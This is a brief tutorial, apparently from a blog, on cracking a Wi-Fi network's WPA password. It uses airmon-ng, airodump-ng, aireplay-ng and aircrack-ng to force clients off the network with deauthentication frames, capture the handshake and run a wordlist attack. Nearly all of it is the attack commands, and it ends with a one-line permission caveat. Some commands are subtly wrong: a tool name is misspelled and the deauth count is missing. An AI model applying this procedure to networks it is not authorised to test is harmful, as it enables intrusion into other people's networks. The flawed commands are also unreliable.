You’ll need
- Backtrack with metasploit
- airmon-ng
- airodump-ng
- aireplay-ng
- aircrack
Verify your wireless is up,
airmon-ng start wlan0
airodump-ng mon0
Find a BSSID MAC address to become a toe (target of evaluation)
Stop the program
Gather the MAC address and Channel which you will use in the command below.
type
airodump-ng -w MyFile -c 1 –bssid MA:CA:DD:RE:SS mon0
while that is running
clone your terminal session and run
aireply-ng -0 – -a MA:CA:DD:RE:SS mon0
to send deauth
after 30 seconds, ^C out
Go back to your normal terminal session
About a minute should have passed
^C out of that program
now dictionary attack the MyFile you created.
type
aircrack-ng MyFile-01.cap -w /pentest/passwords/wordlists/darkc0de.lst
Now we wait. If your password is weak, chances are, it will be cracked here and shown to you.
Perform this on your own network or on a network you have written permission to try it on.
Here is a video that shows exactly the steps above.